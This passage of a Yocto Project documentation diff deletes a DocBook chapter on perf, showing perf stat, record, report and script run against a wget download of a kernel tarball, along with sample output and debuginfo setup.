+Online versions of the man pages for the commands discussed in this
+section can be found here:
+
+- http://linux.die.net/man/8/blktrace
+
+- http://linux.die.net/man/1/blkparse
+
+- http://linux.die.net/man/8/btrace
+
+The above manpages, along with manpages for the other blktrace utilities
+(btt, blkiomon, etc) can be found in the /doc directory of the blktrace
+tools git repo: ::
+
+ $ git clone git://git.kernel.dk/blktrace.git
diff --git a/documentation/profile-manual/profile-manual-usage.xml b/documentation/profile-manual/profile-manual-usage.xml
deleted file mode 100644
index 9a4273a0fe..0000000000
--- a/documentation/profile-manual/profile-manual-usage.xml
+++ /dev/null
@@ -1,2985 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='profile-manual-usage'>
-
-<title>Basic Usage (with examples) for each of the Yocto Tracing Tools</title>
-
-<para>
- This chapter presents basic usage examples for each of the tracing
- tools.
-</para>
-
-<section id='profile-manual-perf'>
- <title>perf</title>
-
- <para>
- The 'perf' tool is the profiling and tracing tool that comes
- bundled with the Linux kernel.
- </para>
-
- <para>
- Don't let the fact that it's part of the kernel fool you into thinking
- that it's only for tracing and profiling the kernel - you can indeed
- use it to trace and profile just the kernel, but you can also use it
- to profile specific applications separately (with or without kernel
- context), and you can also use it to trace and profile the kernel
- and all applications on the system simultaneously to gain a system-wide
- view of what's going on.
- </para>
-
- <para>
- In many ways, perf aims to be a superset of all the tracing and profiling
- tools available in Linux today, including all the other tools covered
- in this HOWTO. The past couple of years have seen perf subsume a lot
- of the functionality of those other tools and, at the same time, those
- other tools have removed large portions of their previous functionality
- and replaced it with calls to the equivalent functionality now
- implemented by the perf subsystem. Extrapolation suggests that at
- some point those other tools will simply become completely redundant
- and go away; until then, we'll cover those other tools in these pages
- and in many cases show how the same things can be accomplished in
- perf and the other tools when it seems useful to do so.
- </para>
-
- <para>
- The coverage below details some of the most common ways you'll likely
- want to apply the tool; full documentation can be found either within
- the tool itself or in the man pages at
- <ulink url='http://linux.die.net/man/1/perf'>perf(1)</ulink>.
- </para>
-
- <section id='perf-setup'>
- <title>Setup</title>
-
- <para>
- For this section, we'll assume you've already performed the basic
- setup outlined in the General Setup section.
- </para>
-
- <para>
- In particular, you'll get the most mileage out of perf if you
- profile an image built with the following in your
- <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INHIBIT_PACKAGE_STRIP'>INHIBIT_PACKAGE_STRIP</ulink> = "1"
- </literallayout>
- </para>
-
- <para>
- perf runs on the target system for the most part. You can archive
- profile data and copy it to the host for analysis, but for the
- rest of this document we assume you've ssh'ed to the host and
- will be running the perf commands on the target.
- </para>
- </section>
-
- <section id='perf-basic-usage'>
- <title>Basic Usage</title>
-
- <para>
- The perf tool is pretty much self-documenting. To remind yourself
- of the available commands, simply type 'perf', which will show you
- basic usage along with the available perf subcommands:
- <literallayout class='monospaced'>
- root@crownbay:~# perf
-
- usage: perf [--version] [--help] COMMAND [ARGS]
-
- The most commonly used perf commands are:
- annotate Read perf.data (created by perf record) and display annotated code
- archive Create archive with object files with build-ids found in perf.data file
- bench General framework for benchmark suites
- buildid-cache Manage build-id cache.
- buildid-list List the buildids in a perf.data file
- diff Read two perf.data files and display the differential profile
- evlist List the event names in a perf.data file
- inject Filter to augment the events stream with additional information
- kmem Tool to trace/measure kernel memory(slab) properties
- kvm Tool to trace/measure kvm guest os
- list List all symbolic event types
- lock Analyze lock events
- probe Define new dynamic tracepoints
- record Run a command and record its profile into perf.data
- report Read perf.data (created by perf record) and display the profile
- sched Tool to trace/measure scheduler properties (latencies)
- script Read perf.data (created by perf record) and display trace output
- stat Run a command and gather performance counter statistics
- test Runs sanity tests.
- timechart Tool to visualize total system behavior during a workload
- top System profiling tool.
-
- See 'perf help COMMAND' for more information on a specific command.
- </literallayout>
- </para>
-
- <section id='using-perf-to-do-basic-profiling'>
- <title>Using perf to do Basic Profiling</title>
-
- <para>
- As a simple test case, we'll profile the 'wget' of a fairly large
- file, which is a minimally interesting case because it has both
- file and network I/O aspects, and at least in the case of standard
- Yocto images, it's implemented as part of busybox, so the methods
- we use to analyze it can be used in a very similar way to the whole
- host of supported busybox applets in Yocto.
- <literallayout class='monospaced'>
- root@crownbay:~# rm linux-2.6.19.2.tar.bz2; \
- wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
- </literallayout>
- The quickest and easiest way to get some basic overall data about
- what's going on for a particular workload is to profile it using
- 'perf stat'. 'perf stat' basically profiles using a few default
- counters and displays the summed counts at the end of the run:
- <literallayout class='monospaced'>
- root@crownbay:~# perf stat wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
- Connecting to downloads.yoctoproject.org (140.211.169.59:80)
- linux-2.6.19.2.tar.b 100% |***************************************************| 41727k 0:00:00 ETA
-
- Performance counter stats for 'wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>':
-
- 4597.223902 task-clock # 0.077 CPUs utilized
- 23568 context-switches # 0.005 M/sec
- 68 CPU-migrations # 0.015 K/sec
- 241 page-faults # 0.052 K/sec
- 3045817293 cycles # 0.663 GHz
- &lt;not supported&gt; stalled-cycles-frontend
- &lt;not supported&gt; stalled-cycles-backend
- 858909167 instructions # 0.28 insns per cycle
- 165441165 branches # 35.987 M/sec
- 19550329 branch-misses # 11.82% of all branches
-
- 59.836627620 seconds time elapsed
- </literallayout>
- Many times such a simple-minded test doesn't yield much of
- interest, but sometimes it does (see Real-world Yocto bug
- (slow loop-mounted write speed)).
- </para>
-
- <para>
- Also, note that 'perf stat' isn't restricted to a fixed set of
- counters - basically any event listed in the output of 'perf list'
- can be tallied by 'perf stat'. For example, suppose we wanted to
- see a summary of all the events related to kernel memory
- allocation/freeing along with cache hits and misses:
- <literallayout class='monospaced'>
- root@crownbay:~# perf stat -e kmem:* -e cache-references -e cache-misses wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
- Connecting to downloads.yoctoproject.org (140.211.169.59:80)
- linux-2.6.19.2.tar.b 100% |***************************************************| 41727k 0:00:00 ETA
-
- Performance counter stats for 'wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>':
-
- 5566 kmem:kmalloc
- 125517 kmem:kmem_cache_alloc
- 0 kmem:kmalloc_node
- 0 kmem:kmem_cache_alloc_node
- 34401 kmem:kfree
- 69920 kmem:kmem_cache_free
- 133 kmem:mm_page_free
- 41 kmem:mm_page_free_batched
- 11502 kmem:mm_page_alloc
- 11375 kmem:mm_page_alloc_zone_locked
- 0 kmem:mm_page_pcpu_drain
- 0 kmem:mm_page_alloc_extfrag
- 66848602 cache-references
- 2917740 cache-misses # 4.365 % of all cache refs
-
- 44.831023415 seconds time elapsed
- </literallayout>
- So 'perf stat' gives us a nice easy way to get a quick overview of
- what might be happening for a set of events, but normally we'd
- need a little more detail in order to understand what's going on
- in a way that we can act on in a useful way.
- </para>
-
- <para>
- To dive down into a next level of detail, we can use 'perf
- record'/'perf report' which will collect profiling data and
- present it to use using an interactive text-based UI (or
- simply as text if we specify --stdio to 'perf report').
- </para>
-
- <para>
- As our first attempt at profiling this workload, we'll simply
- run 'perf record', handing it the workload we want to profile
- (everything after 'perf record' and any perf options we hand
- it - here none - will be executed in a new shell). perf collects
- samples until the process exits and records them in a file named
- 'perf.data' in the current working directory.
- <literallayout class='monospaced'>
- root@crownbay:~# perf record wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
-
- Connecting to downloads.yoctoproject.org (140.211.169.59:80)
- linux-2.6.19.2.tar.b 100% |************************************************| 41727k 0:00:00 ETA
- [ perf record: Woken up 1 times to write data ]
- [ perf record: Captured and wrote 0.176 MB perf.data (~7700 samples) ]
- </literallayout>
- To see the results in a 'text-based UI' (tui), simply run
- 'perf report', which will read the perf.data file in the current
- working directory and display the results in an interactive UI:
- <literallayout class='monospaced'>
- root@crownbay:~# perf report
- </literallayout>
- </para>
-
- <para>
- <imagedata fileref="figures/perf-wget-flat-stripped.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- The above screenshot displays a 'flat' profile, one entry for
- each 'bucket' corresponding to the functions that were profiled
- during the profiling run, ordered from the most popular to the
- least (perf has options to sort in various orders and keys as
- well as display entries only above a certain threshold and so
- on - see the perf documentation for details). Note that this
- includes both userspace functions (entries containing a [.]) and
- kernel functions accounted to the process (entries containing
- a [k]). (perf has command-line modifiers that can be used to
- restrict the profiling to kernel or userspace, among others).
- </para>
-
- <para>
- Notice also that the above report shows an entry for 'busybox',
- which is the executable that implements 'wget' in Yocto, but that
- instead of a useful function name in that entry, it displays
- a not-so-friendly hex value instead. The steps below will show
- how to fix that problem.
- </para>
-
- <para>
- Before we do that, however, let's try running a different profile,
- one which shows something a little more interesting. The only
- difference between the new profile and the previous one is that
- we'll add the -g option, which will record not just the address
- of a sampled function, but the entire callchain to the sampled
- function as well:
- <literallayout class='monospaced'>
- root@crownbay:~# perf record -g wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
- Connecting to downloads.yoctoproject.org (140.211.169.59:80)
- linux-2.6.19.2.tar.b 100% |************************************************| 41727k 0:00:00 ETA
- [ perf record: Woken up 3 times to write data ]
- [ perf record: Captured and wrote 0.652 MB perf.data (~28476 samples) ]
-
-
- root@crownbay:~# perf report
- </literallayout>
- </para>
-
- <para>
- <imagedata fileref="figures/perf-wget-g-copy-to-user-expanded-stripped.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- Using the callgraph view, we can actually see not only which
- functions took the most time, but we can also see a summary of
- how those functions were called and learn something about how the
- program interacts with the kernel in the process.
- </para>
-
- <para>
- Notice that each entry in the above screenshot now contains a '+'
- on the left-hand side. This means that we can expand the entry and
- drill down into the callchains that feed into that entry.
- Pressing 'enter' on any one of them will expand the callchain
- (you can also press 'E' to expand them all at the same time or 'C'
- to collapse them all).
- </para>
-
- <para>
- In the screenshot above, we've toggled the __copy_to_user_ll()
- entry and several subnodes all the way down. This lets us see
- which callchains contributed to the profiled __copy_to_user_ll()
- function which contributed 1.77% to the total profile.
- </para>
-
- <para>
- As a bit of background explanation for these callchains, think
- about what happens at a high level when you run wget to get a file
- out on the network. Basically what happens is that the data comes
- into the kernel via the network connection (socket) and is passed
- to the userspace program 'wget' (which is actually a part of
- busybox, but that's not important for now), which takes the buffers
- the kernel passes to it and writes it to a disk file to save it.
- </para>
-
- <para>
- The part of this process that we're looking at in the above call
- stacks is the part where the kernel passes the data it's read from
- the socket down to wget i.e. a copy-to-user.
- </para>
-
- <para>
- Notice also that here there's also a case where the hex value
- is displayed in the callstack, here in the expanded
- sys_clock_gettime() function. Later we'll see it resolve to a
- userspace function call in busybox.
- </para>
-
- <para>
- <imagedata fileref="figures/perf-wget-g-copy-from-user-expanded-stripped.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- The above screenshot shows the other half of the journey for the
- data - from the wget program's userspace buffers to disk. To get
- the buffers to disk, the wget program issues a write(2), which
- does a copy-from-user to the kernel, which then takes care via
- some circuitous path (probably also present somewhere in the
- profile data), to get it safely to disk.
- </para>
-
- <para>
- Now that we've seen the basic layout of the profile data and the
- basics of how to extract useful information out of it, let's get
- back to the task at hand and see if we can get some basic idea
- about where the time is spent in the program we're profiling,
- wget. Remember that wget is actually implemented as an applet
- in busybox, so while the process name is 'wget', the executable
- we're actually interested in is busybox. So let's expand the
- first entry containing busybox:
- </para>
-
- <para>
- <imagedata fileref="figures/perf-wget-busybox-expanded-stripped.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- Again, before we expanded we saw that the function was labeled
- with a hex value instead of a symbol as with most of the kernel
- entries. Expanding the busybox entry doesn't make it any better.
- </para>
-
- <para>
- The problem is that perf can't find the symbol information for the
- busybox binary, which is actually stripped out by the Yocto build
- system.
- </para>
-
- <para>
- One way around that is to put the following in your
- <filename>local.conf</filename> file when you build the image:
- <literallayout class='monospaced'>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-INHIBIT_PACKAGE_STRIP'>INHIBIT_PACKAGE_STRIP</ulink> = "1"
- </literallayout>
- However, we already have an image with the binaries stripped,
- so what can we do to get perf to resolve the symbols? Basically
- we need to install the debuginfo for the busybox package.
- </para>
-
- <para>
- To generate the debug info for the packages in the image, we can
- add dbg-pkgs to EXTRA_IMAGE_FEATURES in local.conf. For example:
- <literallayout class='monospaced'>
- EXTRA_IMAGE_FEATURES = "debug-tweaks tools-profile dbg-pkgs"
- </literallayout>
- Additionally, in order to generate the type of debuginfo that
- perf understands, we also need to set
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_DEBUG_SPLIT_STYLE'><filename>PACKAGE_DEBUG_SPLIT_STYLE</filename></ulink>
- in the <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- PACKAGE_DEBUG_SPLIT_STYLE = 'debug-file-directory'
- </literallayout>
- Once we've done that, we can install the debuginfo for busybox.
- The debug packages once built can be found in
- build/tmp/deploy/rpm/* on the host system. Find the
- busybox-dbg-...rpm file and copy it to the target. For example:
- <literallayout class='monospaced'>
- [trz@empanada core2]$ scp /home/trz/yocto/crownbay-tracing-dbg/build/tmp/deploy/rpm/core2_32/busybox-dbg-1.20.2-r2.core2_32.rpm root@192.168.1.31:
- root@192.168.1.31's password:
- busybox-dbg-1.20.2-r2.core2_32.rpm 100% 1826KB 1.8MB/s 00:01
- </literallayout>
- Now install the debug rpm on the target:
- <literallayout class='monospaced'>
- root@crownbay:~# rpm -i busybox-dbg-1.20.2-r2.core2_32.rpm
- </literallayout>
- Now that the debuginfo is installed, we see that the busybox
- entries now display their functions symbolically:
- </para>
-
- <para>
- <imagedata fileref="figures/perf-wget-busybox-debuginfo.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- If we expand one of the entries and press 'enter' on a leaf node,
- we're presented with a menu of actions we can take to get more
- information related to that entry:
- </para>
-
- <para>
- <imagedata fileref="figures/perf-wget-busybox-dso-zoom-menu.png" width="6in" depth="2in" align="center" scalefit="1" />
- </para>
-
- <para>
- One of these actions allows us to show a view that displays a
- busybox-centric view of the profiled functions (in this case we've
- also expanded all the nodes using the 'E' key):
- </para>
-
- <para>
- <imagedata fileref="figures/perf-wget-busybox-dso-zoom.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- Finally, we can see that now that the busybox debuginfo is
- installed, the previously unresolved symbol in the
- sys_clock_gettime() entry mentioned previously is now resolved,
- and shows that the sys_clock_gettime system call that was the
- source of 6.75% of the copy-to-user overhead was initiated by
- the handle_input() busybox function:
- </para>
-
- <para>
- <imagedata fileref="figures/perf-wget-g-copy-to-user-expanded-debuginfo.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- At the lowest level of detail, we can dive down to the assembly
- level and see which instructions caused the most overhead in a
- function. Pressing 'enter' on the 'udhcpc_main' function, we're
- again presented with a menu:
- </para>
-
- <para>
- <imagedata fileref="figures/perf-wget-busybox-annotate-menu.png" width="6in" depth="2in" align="center" scalefit="1" />
- </para>
-
- <para>
- Selecting 'Annotate udhcpc_main', we get a detailed listing of
- percentages by instruction for the udhcpc_main function. From the
- display, we can see that over 50% of the time spent in this
- function is taken up by a couple tests and the move of a
- constant (1) to a register:
- </para>
-
- <para>
- <imagedata fileref="figures/perf-wget-busybox-annotate-udhcpc.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- As a segue into tracing, let's try another profile using a
- different counter, something other than the default 'cycles'.
- </para>
-
- <para>
- The tracing and profiling infrastructure in Linux has become
- unified in a way that allows us to use the same tool with a
- completely different set of counters, not just the standard
- hardware counters that traditional tools have had to restrict
- themselves to (of course the traditional tools can also make use
- of the expanded possibilities now available to them, and in some
- cases have, as mentioned previously).
- </para>
-
- <para>
- We can get a list of the available events that can be used to
- profile a workload via 'perf list':
- <literallayout class='monospaced'>
- root@crownbay:~# perf list
-
- List of pre-defined events (to be used in -e):
- cpu-cycles OR cycles [Hardware event]
- stalled-cycles-frontend OR idle-cycles-frontend [Hardware event]
- stalled-cycles-backend OR idle-cycles-backend [Hardware event]
- instructions [Hardware event]
- cache-references [Hardware event]
- cache-misses [Hardware event]
- branch-instructions OR branches [Hardware event]
- branch-misses [Hardware event]
- bus-cycles [Hardware event]
- ref-cycles [Hardware event]
-
- cpu-clock [Software event]
- task-clock [Software event]
- page-faults OR faults [Software event]
- minor-faults [Software event]
- major-faults [Software event]
- context-switches OR cs [Software event]
- cpu-migrations OR migrations [Software event]
- alignment-faults [Software event]
- emulation-faults [Software event]
-
- L1-dcache-loads [Hardware cache event]
- L1-dcache-load-misses [Hardware cache event]
- L1-dcache-prefetch-misses [Hardware cache event]
- L1-icache-loads [Hardware cache event]
- L1-icache-load-misses [Hardware cache event]
- .
- .
- .
- rNNN [Raw hardware event descriptor]
- cpu/t1=v1[,t2=v2,t3 ...]/modifier [Raw hardware event descriptor]
- (see 'perf list --help' on how to encode it)
-
- mem:&lt;addr&gt;[:access] [Hardware breakpoint]
-
- sunrpc:rpc_call_status [Tracepoint event]
- sunrpc:rpc_bind_status [Tracepoint event]
- sunrpc:rpc_connect_status [Tracepoint event]
- sunrpc:rpc_task_begin [Tracepoint event]
- skb:kfree_skb [Tracepoint event]
- skb:consume_skb [Tracepoint event]
- skb:skb_copy_datagram_iovec [Tracepoint event]
- net:net_dev_xmit [Tracepoint event]
- net:net_dev_queue [Tracepoint event]
- net:netif_receive_skb [Tracepoint event]
- net:netif_rx [Tracepoint event]
- napi:napi_poll [Tracepoint event]
- sock:sock_rcvqueue_full [Tracepoint event]
- sock:sock_exceed_buf_limit [Tracepoint event]
- udp:udp_fail_queue_rcv_skb [Tracepoint event]
- hda:hda_send_cmd [Tracepoint event]
- hda:hda_get_response [Tracepoint event]
- hda:hda_bus_reset [Tracepoint event]
- scsi:scsi_dispatch_cmd_start [Tracepoint event]
- scsi:scsi_dispatch_cmd_error [Tracepoint event]
- scsi:scsi_eh_wakeup [Tracepoint event]
- drm:drm_vblank_event [Tracepoint event]
- drm:drm_vblank_event_queued [Tracepoint event]
- drm:drm_vblank_event_delivered [Tracepoint event]
- random:mix_pool_bytes [Tracepoint event]
- random:mix_pool_bytes_nolock [Tracepoint event]
- random:credit_entropy_bits [Tracepoint event]
- gpio:gpio_direction [Tracepoint event]
- gpio:gpio_value [Tracepoint event]
- block:block_rq_abort [Tracepoint event]
- block:block_rq_requeue [Tracepoint event]
- block:block_rq_issue [Tracepoint event]
- block:block_bio_bounce [Tracepoint event]
- block:block_bio_complete [Tracepoint event]
- block:block_bio_backmerge [Tracepoint event]
- .
- .
- writeback:writeback_wake_thread [Tracepoint event]
- writeback:writeback_wake_forker_thread [Tracepoint event]
- writeback:writeback_bdi_register [Tracepoint event]
- .
- .
- writeback:writeback_single_inode_requeue [Tracepoint event]
- writeback:writeback_single_inode [Tracepoint event]
- kmem:kmalloc [Tracepoint event]
- kmem:kmem_cache_alloc [Tracepoint event]
- kmem:mm_page_alloc [Tracepoint event]
- kmem:mm_page_alloc_zone_locked [Tracepoint event]
- kmem:mm_page_pcpu_drain [Tracepoint event]
- kmem:mm_page_alloc_extfrag [Tracepoint event]
- vmscan:mm_vmscan_kswapd_sleep [Tracepoint event]
- vmscan:mm_vmscan_kswapd_wake [Tracepoint event]
- vmscan:mm_vmscan_wakeup_kswapd [Tracepoint event]
- vmscan:mm_vmscan_direct_reclaim_begin [Tracepoint event]
- .
- .
- module:module_get [Tracepoint event]
- module:module_put [Tracepoint event]
- module:module_request [Tracepoint event]
- sched:sched_kthread_stop [Tracepoint event]
- sched:sched_wakeup [Tracepoint event]
- sched:sched_wakeup_new [Tracepoint event]
- sched:sched_process_fork [Tracepoint event]
- sched:sched_process_exec [Tracepoint event]
- sched:sched_stat_runtime [Tracepoint event]
- rcu:rcu_utilization [Tracepoint event]
- workqueue:workqueue_queue_work [Tracepoint event]
- workqueue:workqueue_execute_end [Tracepoint event]
- signal:signal_generate [Tracepoint event]
- signal:signal_deliver [Tracepoint event]
- timer:timer_init [Tracepoint event]
- timer:timer_start [Tracepoint event]
- timer:hrtimer_cancel [Tracepoint event]
- timer:itimer_state [Tracepoint event]
- timer:itimer_expire [Tracepoint event]
- irq:irq_handler_entry [Tracepoint event]
- irq:irq_handler_exit [Tracepoint event]
- irq:softirq_entry [Tracepoint event]
- irq:softirq_exit [Tracepoint event]
- irq:softirq_raise [Tracepoint event]
- printk:console [Tracepoint event]
- task:task_newtask [Tracepoint event]
- task:task_rename [Tracepoint event]
- syscalls:sys_enter_socketcall [Tracepoint event]
- syscalls:sys_exit_socketcall [Tracepoint event]
- .
- .
- .
- syscalls:sys_enter_unshare [Tracepoint event]
- syscalls:sys_exit_unshare [Tracepoint event]
- raw_syscalls:sys_enter [Tracepoint event]
- raw_syscalls:sys_exit [Tracepoint event]
- </literallayout>
- </para>
-
- <informalexample>
- <emphasis>Tying it Together:</emphasis> These are exactly the same set of events defined
- by the trace event subsystem and exposed by
- ftrace/tracecmd/kernelshark as files in
- /sys/kernel/debug/tracing/events, by SystemTap as
- kernel.trace("tracepoint_name") and (partially) accessed by LTTng.
- </informalexample>
-
- <para>
- Only a subset of these would be of interest to us when looking at
- this workload, so let's choose the most likely subsystems
- (identified by the string before the colon in the Tracepoint events)
- and do a 'perf stat' run using only those wildcarded subsystems:
- <literallayout class='monospaced'>
- root@crownbay:~# perf stat -e skb:* -e net:* -e napi:* -e sched:* -e workqueue:* -e irq:* -e syscalls:* wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
- Performance counter stats for 'wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>':
-
- 23323 skb:kfree_skb
- 0 skb:consume_skb
- 49897 skb:skb_copy_datagram_iovec
- 6217 net:net_dev_xmit
- 6217 net:net_dev_queue
- 7962 net:netif_receive_skb
- 2 net:netif_rx
- 8340 napi:napi_poll
- 0 sched:sched_kthread_stop
- 0 sched:sched_kthread_stop_ret
- 3749 sched:sched_wakeup
- 0 sched:sched_wakeup_new
- 0 sched:sched_switch
- 29 sched:sched_migrate_task
- 0 sched:sched_process_free
- 1 sched:sched_process_exit
- 0 sched:sched_wait_task
- 0 sched:sched_process_wait
- 0 sched:sched_process_fork
- 1 sched:sched_process_exec
- 0 sched:sched_stat_wait
- 2106519415641 sched:sched_stat_sleep
- 0 sched:sched_stat_iowait
- 147453613 sched:sched_stat_blocked
- 12903026955 sched:sched_stat_runtime
- 0 sched:sched_pi_setprio
- 3574 workqueue:workqueue_queue_work
- 3574 workqueue:workqueue_activate_work
- 0 workqueue:workqueue_execute_start
- 0 workqueue:workqueue_execute_end
- 16631 irq:irq_handler_entry
- 16631 irq:irq_handler_exit
- 28521 irq:softirq_entry
- 28521 irq:softirq_exit
- 28728 irq:softirq_raise
- 1 syscalls:sys_enter_sendmmsg
- 1 syscalls:sys_exit_sendmmsg
- 0 syscalls:sys_enter_recvmmsg
- 0 syscalls:sys_exit_recvmmsg
- 14 syscalls:sys_enter_socketcall
- 14 syscalls:sys_exit_socketcall
- .
- .
- .
- 16965 syscalls:sys_enter_read
- 16965 syscalls:sys_exit_read
- 12854 syscalls:sys_enter_write
- 12854 syscalls:sys_exit_write
- .
- .
- .
-
- 58.029710972 seconds time elapsed
- </literallayout>
- Let's pick one of these tracepoints and tell perf to do a profile
- using it as the sampling event:
- <literallayout class='monospaced'>
- root@crownbay:~# perf record -g -e sched:sched_wakeup wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
- </literallayout>
- </para>
-
- <para>
- <imagedata fileref="figures/sched-wakeup-profile.png" width="6in" depth="7in" align="center" scalefit="1" />
- </para>
-
- <para>
- The screenshot above shows the results of running a profile using
- sched:sched_switch tracepoint, which shows the relative costs of
- various paths to sched_wakeup (note that sched_wakeup is the
- name of the tracepoint - it's actually defined just inside
- ttwu_do_wakeup(), which accounts for the function name actually
- displayed in the profile:
- <literallayout class='monospaced'>
- /*
- * Mark the task runnable and perform wakeup-preemption.
- */
- static void
- ttwu_do_wakeup(struct rq *rq, struct task_struct *p, int wake_flags)
- {
- trace_sched_wakeup(p, true);
- .
- .
- .
- }
- </literallayout>
- A couple of the more interesting callchains are expanded and
- displayed above, basically some network receive paths that
- presumably end up waking up wget (busybox) when network data is
- ready.
- </para>
-
- <para>
- Note that because tracepoints are normally used for tracing,
- the default sampling period for tracepoints is 1 i.e. for
- tracepoints perf will sample on every event occurrence (this
- can be changed using the -c option). This is in contrast to
- hardware counters such as for example the default 'cycles'
- hardware counter used for normal profiling, where sampling
- periods are much higher (in the thousands) because profiling should
- have as low an overhead as possible and sampling on every cycle
- would be prohibitively expensive.
- </para>
- </section>
-
- <section id='using-perf-to-do-basic-tracing'>
- <title>Using perf to do Basic Tracing</title>
-
- <para>
- Profiling is a great tool for solving many problems or for
- getting a high-level view of what's going on with a workload or
- across the system. It is however by definition an approximation,
- as suggested by the most prominent word associated with it,
- 'sampling'. On the one hand, it allows a representative picture of
- what's going on in the system to be cheaply taken, but on the other
- hand, that cheapness limits its utility when that data suggests a
- need to 'dive down' more deeply to discover what's really going
- on. In such cases, the only way to see what's really going on is
- to be able to look at (or summarize more intelligently) the
- individual steps that go into the higher-level behavior exposed
- by the coarse-grained profiling data.
- </para>
-
- <para>
- As a concrete example, we can trace all the events we think might
- be applicable to our workload:
- <literallayout class='monospaced'>
- root@crownbay:~# perf record -g -e skb:* -e net:* -e napi:* -e sched:sched_switch -e sched:sched_wakeup -e irq:*
- -e syscalls:sys_enter_read -e syscalls:sys_exit_read -e syscalls:sys_enter_write -e syscalls:sys_exit_write
- wget <ulink url='http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2'>http://downloads.yoctoproject.org/mirror/sources/linux-2.6.19.2.tar.bz2</ulink>
- </literallayout>
- We can look at the raw trace output using 'perf script' with no
- arguments:
- <literallayout class='monospaced'>
- root@crownbay:~# perf script
-
- perf 1262 [000] 11624.857082: sys_exit_read: 0x0
- perf 1262 [000] 11624.857193: sched_wakeup: comm=migration/0 pid=6 prio=0 success=1 target_cpu=000
- wget 1262 [001] 11624.858021: softirq_raise: vec=1 [action=TIMER]
- wget 1262 [001] 11624.858074: softirq_entry: vec=1 [action=TIMER]
- wget 1262 [001] 11624.858081: softirq_exit: vec=1 [action=TIMER]
- wget 1262 [001] 11624.858166: sys_enter_read: fd: 0x0003, buf: 0xbf82c940, count: 0x0200
- wget 1262 [001] 11624.858177: sys_exit_read: 0x200
- wget 1262 [001] 11624.858878: kfree_skb: skbaddr=0xeb248d80 protocol=0 location=0xc15a5308
- wget 1262 [001] 11624.858945: kfree_skb: skbaddr=0xeb248000 protocol=0 location=0xc15a5308
- wget 1262 [001] 11624.859020: softirq_raise: vec=1 [action=TIMER]
- wget 1262 [001] 11624.859076: softirq_entry: vec=1 [action=TIMER]
- wget 1262 [001] 11624.859083: softirq_exit: vec=1 [action=TIMER]
- wget 1262 [001] 11624.859167: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
- wget 1262 [001] 11624.859192: sys_exit_read: 0x1d7
- wget 1262 [001] 11624.859228: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
- wget 1262 [001] 11624.859233: sys_exit_read: 0x0
- wget 1262 [001] 11624.859573: sys_enter_read: fd: 0x0003, buf: 0xbf82c580, count: 0x0200
- wget 1262 [001] 11624.859584: sys_exit_read: 0x200
- wget 1262 [001] 11624.859864: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
- wget 1262 [001] 11624.859888: sys_exit_read: 0x400
- wget 1262 [001] 11624.859935: sys_enter_read: fd: 0x0003, buf: 0xb7720000, count: 0x0400
- wget 1262 [001] 11624.859944: sys_exit_read: 0x400
- </literallayout>
- This gives us a detailed timestamped sequence of events that
- occurred within the workload with respect to those events.
- </para>
-
- <para>
- In many ways, profiling can be viewed as a subset of tracing -
- theoretically, if you have a set of trace events that's sufficient
- to capture all the important aspects of a workload, you can derive
- any of the results or views that a profiling run can.
- </para>
-
- <para>
- Another aspect of traditional profiling is that while powerful in
- many ways, it's limited by the granularity of the underlying data.
- Profiling tools offer various ways of sorting and presenting the
- sample data, which make it much more useful and amenable to user
- experimentation, but in the end it can't be used in an open-ended
- way to extract data that just isn't present as a consequence of
- the fact that conceptually, most of it has been thrown away.
- </para>
-
- <para>
